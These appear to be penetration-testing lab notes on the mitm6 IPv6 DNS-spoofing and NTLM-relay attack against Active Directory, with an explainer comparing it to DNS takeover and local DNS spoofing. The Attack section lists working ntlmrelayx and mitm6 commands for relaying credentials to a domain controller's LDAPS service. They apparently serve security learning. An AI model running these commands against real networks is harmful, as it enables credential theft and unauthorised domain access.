What is?

In many Windows environments, IPv6 is enabled by default but not actively used. Since Windows prefers IPv6 over IPv4, an attacker can exploit this by deploying MITM6 to set up a rogue IPv6 DHCP server, forcing domain-joined machines to use the attacker’s machine as the DNS server. This effectively spoofs DNS responses, redirecting authentication requests to the attacker's system. When clients attempt to authenticate with the Domain Controller (DC) via LDAP or SMB, the attacker captures NTLM credentials and relays them to the DC using NTLMRelayX. If successful, the attacker can create a new machine account in the domain, gaining persistent access. Additionally, as users authenticate across the network, their credentials are intercepted and relayed, potentially escalating privileges.

<aside> 💡

Yes, the three attacks—IPv6 DNS Spoofing & NTLM Relay (MITM6), DNS Takeover Attack, and Local DNS Spoofing—are related but distinct in how they operate and their objectives.

1. IPv6 DNS Spoofing & NTLM Relay Attack (MITM6 + NTLMRelayX)

🔹 Goal: Capture and relay NTLM authentication to a Domain Controller to create a machine account or escalate privileges.

🔹 Method: Abuse IPv6 auto-configuration to spoof the DNS server, forcing machines to send authentication requests to an attacker.

🔹 Target: Active Directory authentication (LDAP/SMB) inside a local network.

🔹 Relation to DNS Takeover: It’s a form of local DNS spoofing, but instead of targeting internet domains, it tricks Windows authentication mechanisms.

2. DNS Takeover Attack

🔹 Goal: Gain control over a public domain or subdomain to redirect users or impersonate services.

🔹 Method: Exploit misconfigured, expired, or hijacked DNS records (e.g., subdomain takeover).

🔹 Target: External users or cloud services relying on hijacked domains.

🔹 Relation to IPv6 DNS Spoofing: It’s broader in scope and affects external domains, while MITM6 targets local authentication.

3. Local DNS Spoofing Attack

🔹 Goal: Redirect internal users to malicious sites or services within a network.

🔹 Method: Modify local DNS responses (e.g., using tools like Responder) to fake legitimate internal services.

🔹 Target: Any local network users, often for phishing or credential capture.

🔹 Relation to MITM6 & DNS Takeover:

• Like MITM6, it manipulates local network DNS, but doesn’t focus on NTLM relay.
• Unlike DNS Takeover, it doesn’t affect external domains—just the local network.

Summary:

• MITM6 + NTLM Relay = Local DNS spoofing to hijack authentication traffic.
• DNS Takeover = External domain hijacking (e.g., subdomain takeover).
• Local DNS Spoofing = Redirecting internal traffic for phishing or credential harvesting.

Each attack has overlapping techniques but different objectives and targets. 🚀

</aside>

Attack

Run ntlmrelayx first then mitm6.

1. ntlmrelayx

   impacket-ntlmrelayx -6 -t ldaps://192.168.150.128 -wh fakewpad.marvel.local -l lootme
   

   • -6: MITM6
   • -t: Target
   • -wh: WPAD
   • -l: Create a folder

2. MITM6

sudo mitm6 -d marvel.local

• -d: Domain

lootme Folder

• If the LastLogon is empty, it will most likely be a honeypot

Attack Successful (Admin Login Captured)